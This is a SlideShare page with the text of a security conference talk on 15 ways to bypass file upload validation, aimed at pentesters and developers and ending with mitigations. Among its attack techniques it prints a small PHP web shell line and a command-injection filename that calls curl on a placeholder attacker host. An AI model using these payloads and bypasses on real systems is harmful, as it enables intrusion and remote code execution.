SlideShare a Scribd company logo

"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy

HackIT Ukraine
HackIT Ukraine

During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!

Related slideshows

Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
1 of 31
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
Ebrahim Hegazy 15 Technique to Exploit File Upload Pages Senior Consultant @ Deloitte
About me Security Guy!
About me Top Yahoo Security Researcher
Agenda • Target of the session • How file upload pages works? • Bypassing Developers validation of: – Filename only (Whitelist) – Filename only (Blacklist) – File Type only – File Contents only – Filename and File-type – File type and File-contents – Filename, File-type and File content – Exploiting Server Side Libraries – Forcing the files to be downloadable not executable – Exploitation of other common developers mistakes • Conclusion
Target of the Session The main target of this session is: • Gathering all techniques in one place to aid penetration testers and bug hunters during their assessments. • Helping developers understand how hackers bypass their validations in order to better protect their Apps.
Teaser!
File upload pages and its main headers For every file upload page, there are some headers that always exist. Lets name it main headers. The main headers are: • File Name • File Type • Magic Number • File Content • File Size
Bypassing Developers Validation Scenarios: In the coming slides, we will go through different scenarios of how developers validates the uploaded files and how Pentesters can bypass it.
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
Scenario 1 (BlackList) Blacklisting Dangerous files? The developer validates that the uploaded file doesn‟t have or contain .php, PHP, or php5 etc via black-listing technique. Bypass: Above Regex is vulnerable as it doesn‟t check the case insensitivity of file extension. Mitigation: ^.*.(php|php1|php2|php3|php4|php5|php6|php7|phtml|exe)$/i
Scenario 2 (Apache-Linux) Properly Blacklisting .php files The developer properly validate that the uploaded file doesn‟t have or contain .php, PHP, or php5 etc via black-listing technique. How to bypass: We can bypass this validation using the .pht files. The PHT file stores HTML page that includes a PHP script.
Scenario 2 (IIS-Windows) On windows servers, if the same validation is done for asp pages, we can bypass it using .cer & .asa extensions. IIS <= 7.5 have Both *.asp and *.cer mapped to asp.dll, thus executing ASP code.
Scenario 3 (BlackList) Bypassing all executabel extensions? In this scenario the developer is black-listing all dangerous extensions that would allow code execution. But how about using .eml to trigger a Stored XSS? Source: https://jankopecky.net/index.php/2017/04/18/0day-textplain-considered-harmful/
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
Scenario 4 Validating Filename only (Whitelist): In this scenario, the developer is validating the filename ONLY by Whitelisting .jpg via server-side code, using below Regex
Scenario 4 Validating Filename only (Whitelist): The regex is NOT properly implemented. It validates that the filename contains .jpg but doesn‟t validate that the filename ends with .jpg Moreover on While-listing: ^.*(jpg|gif|png)$i Regex doesn‟t contain Dot, means it only makes sure that file ends with allowed filenames: File.php.jkha11111jpg
Scenario 5 Null Byte Injection The null character is a control character with the value zero. PHP treats the Null Bytes %00 as a terminator (same as C does). Thus, renaming your file to be shell.php%001.jpg or shell.phpx00.jpg shall satisfy the file upload page because the file ends with .jpg, but the file will be treated as .php due to termination of whatever after the Null Byte. Note: renaming the file to shell.phpD.jpg, upload it and then replace the hex represntaion of D with 00 will also work.
Scenario 6 If the application allows upload of .svg images SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance a Stored XSS as below.
Scenario 7 Allowing video uploads? Due to a SSRF vulnerability in ffmpeg library, it is possible to create a video file that when uploaded to any application that supports video files (i.e Youtube, vk, Flicker etc) you will be able to read files from that server when you try to watch the video! Command: ffmpeg -i video.avi{m3u} video.mp4 - https://github.com/neex/ffmpeg-avi-m3u-xbin/
Scenario 8 Directory Traversal You can upload your file with the name of “../../../logo.jpg” for example to replace the main website logo. This issue happens due to lack of validating the filename.
Scenario 9 Validating the file content and missing the file-name. Developer is passing the uploaded file to PHP-GD library to make sure that the uploaded file is an image and doesn‟t contain meta-data, however, not validating the uploaded file name. How to bypass: • We get a normal image, convert it using the php-gd library • Now we have 2 files, we convert it to hex and start searching for identical bytes • When finding the identical bytes, we replace those bytes with out backdoor code (i.e. <?system($GET[„x‟]);?>)
Scenario 9 POC Validating the file content and missing the file-name. Developer is passing the uploaded file to PHP-GD library to make sure that the uploaded file is an image and doesn‟t contain meta-data, however, not validating the uploaded file name. https://secgeek.net/bookfresh-vulnerability/
Scenario 10 Image Tragic Attack SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance ImageMagic which is an image processing library vulnerable to SSRF and RCE vulnerabilities. Source (Facebook RCE): http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html
Scenario 11 Exploiting old IIS servers IIS in its earlier versions < 7.0 had an issue handling the uploaded files. An attacker can bypass the file upload pages using filename as: shell.aspx;1.jpg
Scenario 12 DOS Attack Web applications that doesn‟t validate the file-size of the uploaded files are vulnerable to DOS attack as an attacker can upload many large files which will exhaust the server hosting space.
Scenario 13 Magic Numbers Developers validates the file-contents starts with Magic Numbers and the file-content is set to image/gif. Exploit: Uploading shell.php but setting the content type to image/gif and starting the file contants with GIF89a; will do the job! RCE via zip files Developers accepts zip file, but handle filenames via command line. Exploit: Filename;curl attacker.com;pwd.jpg
Scenario 14 OOB SQL Injection via filename: If the developers are trusting the filenames and pass it directly to the Database, this will allow attackers to execute Out of Band SQL Injection. A good scenario would be companies asking you to submit your CV without validating the CV name.
Scenario 15 Cross Domain Content Hijacking When developers are validating the uploaded filename, content-type but missing to validate the uploaded file content. It is possible to upload a Flash file with .jpg extension, then call that flash file with <object tags in your website and Bingo, you are able to do Cross Origin Requests to steal CSRF tokens. How browsers see it? 1. Plugins like Flash doesn't care about the extension or content-type 2. If the file is embeded using <object> tag, it will be executed as a Flash file as long as the file content looks like Flash. https://github.com/nccgroup/CrossSiteContentHijacking
Conclusion Suggested techniques of better handling the file-upload pages • Always use a sandbox domain to store uploaded files • Use CDN servers as it only allows cacheable resources and disable executable files such as php • Rename the uploaded files to some random filenames, remove the file extension and then append your allowed file extension. • Mark all files as downloadable not executable (Content-Deposition) • Validate the file-size.
Stay in Touch! Twitter: Zigoo0 Email: Ehegazy@deloitte.nl Site: www.Sec-Down.com Деякі випадкові слова, щоб інші думали, що я володію українською мовою! Ale ya ne volodiyu :D

More Related Content

"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy

  • 2. Ebrahim Hegazy 15 Technique to Exploit File Upload Pages Senior Consultant @ Deloitte
  • 4. About me Top Yahoo Security Researcher
  • 5. Agenda • Target of the session • How file upload pages works? • Bypassing Developers validation of: – Filename only (Whitelist) – Filename only (Blacklist) – File Type only – File Contents only – Filename and File-type – File type and File-contents – Filename, File-type and File content – Exploiting Server Side Libraries – Forcing the files to be downloadable not executable – Exploitation of other common developers mistakes • Conclusion
  • 6. Target of the Session The main target of this session is: • Gathering all techniques in one place to aid penetration testers and bug hunters during their assessments. • Helping developers understand how hackers bypass their validations in order to better protect their Apps.
  • 8. File upload pages and its main headers For every file upload page, there are some headers that always exist. Lets name it main headers. The main headers are: • File Name • File Type • Magic Number • File Content • File Size
  • 9. Bypassing Developers Validation Scenarios: In the coming slides, we will go through different scenarios of how developers validates the uploaded files and how Pentesters can bypass it.
  • 11. Scenario 1 (BlackList) Blacklisting Dangerous files? The developer validates that the uploaded file doesn‟t have or contain .php, PHP, or php5 etc via black-listing technique. Bypass: Above Regex is vulnerable as it doesn‟t check the case insensitivity of file extension. Mitigation: ^.*.(php|php1|php2|php3|php4|php5|php6|php7|phtml|exe)$/i
  • 12. Scenario 2 (Apache-Linux) Properly Blacklisting .php files The developer properly validate that the uploaded file doesn‟t have or contain .php, PHP, or php5 etc via black-listing technique. How to bypass: We can bypass this validation using the .pht files. The PHT file stores HTML page that includes a PHP script.
  • 13. Scenario 2 (IIS-Windows) On windows servers, if the same validation is done for asp pages, we can bypass it using .cer & .asa extensions. IIS <= 7.5 have Both *.asp and *.cer mapped to asp.dll, thus executing ASP code.
  • 14. Scenario 3 (BlackList) Bypassing all executabel extensions? In this scenario the developer is black-listing all dangerous extensions that would allow code execution. But how about using .eml to trigger a Stored XSS? Source: https://jankopecky.net/index.php/2017/04/18/0day-textplain-considered-harmful/
  • 16. Scenario 4 Validating Filename only (Whitelist): In this scenario, the developer is validating the filename ONLY by Whitelisting .jpg via server-side code, using below Regex
  • 17. Scenario 4 Validating Filename only (Whitelist): The regex is NOT properly implemented. It validates that the filename contains .jpg but doesn‟t validate that the filename ends with .jpg Moreover on While-listing: ^.*(jpg|gif|png)$i Regex doesn‟t contain Dot, means it only makes sure that file ends with allowed filenames: File.php.jkha11111jpg
  • 18. Scenario 5 Null Byte Injection The null character is a control character with the value zero. PHP treats the Null Bytes %00 as a terminator (same as C does). Thus, renaming your file to be shell.php%001.jpg or shell.phpx00.jpg shall satisfy the file upload page because the file ends with .jpg, but the file will be treated as .php due to termination of whatever after the Null Byte. Note: renaming the file to shell.phpD.jpg, upload it and then replace the hex represntaion of D with 00 will also work.
  • 19. Scenario 6 If the application allows upload of .svg images SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance a Stored XSS as below.
  • 20. Scenario 7 Allowing video uploads? Due to a SSRF vulnerability in ffmpeg library, it is possible to create a video file that when uploaded to any application that supports video files (i.e Youtube, vk, Flicker etc) you will be able to read files from that server when you try to watch the video! Command: ffmpeg -i video.avi{m3u} video.mp4 - https://github.com/neex/ffmpeg-avi-m3u-xbin/
  • 21. Scenario 8 Directory Traversal You can upload your file with the name of “../../../logo.jpg” for example to replace the main website logo. This issue happens due to lack of validating the filename.
  • 22. Scenario 9 Validating the file content and missing the file-name. Developer is passing the uploaded file to PHP-GD library to make sure that the uploaded file is an image and doesn‟t contain meta-data, however, not validating the uploaded file name. How to bypass: • We get a normal image, convert it using the php-gd library • Now we have 2 files, we convert it to hex and start searching for identical bytes • When finding the identical bytes, we replace those bytes with out backdoor code (i.e. <?system($GET[„x‟]);?>)
  • 23. Scenario 9 POC Validating the file content and missing the file-name. Developer is passing the uploaded file to PHP-GD library to make sure that the uploaded file is an image and doesn‟t contain meta-data, however, not validating the uploaded file name. https://secgeek.net/bookfresh-vulnerability/
  • 24. Scenario 10 Image Tragic Attack SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance ImageMagic which is an image processing library vulnerable to SSRF and RCE vulnerabilities. Source (Facebook RCE): http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html
  • 25. Scenario 11 Exploiting old IIS servers IIS in its earlier versions < 7.0 had an issue handling the uploaded files. An attacker can bypass the file upload pages using filename as: shell.aspx;1.jpg
  • 26. Scenario 12 DOS Attack Web applications that doesn‟t validate the file-size of the uploaded files are vulnerable to DOS attack as an attacker can upload many large files which will exhaust the server hosting space.
  • 27. Scenario 13 Magic Numbers Developers validates the file-contents starts with Magic Numbers and the file-content is set to image/gif. Exploit: Uploading shell.php but setting the content type to image/gif and starting the file contants with GIF89a; will do the job! RCE via zip files Developers accepts zip file, but handle filenames via command line. Exploit: Filename;curl attacker.com;pwd.jpg
  • 28. Scenario 14 OOB SQL Injection via filename: If the developers are trusting the filenames and pass it directly to the Database, this will allow attackers to execute Out of Band SQL Injection. A good scenario would be companies asking you to submit your CV without validating the CV name.
  • 29. Scenario 15 Cross Domain Content Hijacking When developers are validating the uploaded filename, content-type but missing to validate the uploaded file content. It is possible to upload a Flash file with .jpg extension, then call that flash file with <object tags in your website and Bingo, you are able to do Cross Origin Requests to steal CSRF tokens. How browsers see it? 1. Plugins like Flash doesn't care about the extension or content-type 2. If the file is embeded using <object> tag, it will be executed as a Flash file as long as the file content looks like Flash. https://github.com/nccgroup/CrossSiteContentHijacking
  • 30. Conclusion Suggested techniques of better handling the file-upload pages • Always use a sandbox domain to store uploaded files • Use CDN servers as it only allows cacheable resources and disable executable files such as php • Rename the uploaded files to some random filenames, remove the file extension and then append your allowed file extension. • Mark all files as downloadable not executable (Content-Deposition) • Validate the file-size.
  • 31. Stay in Touch! Twitter: Zigoo0 Email: Ehegazy@deloitte.nl Site: www.Sec-Down.com Деякі випадкові слова, щоб інші думали, що я володію українською мовою! Ale ya ne volodiyu :D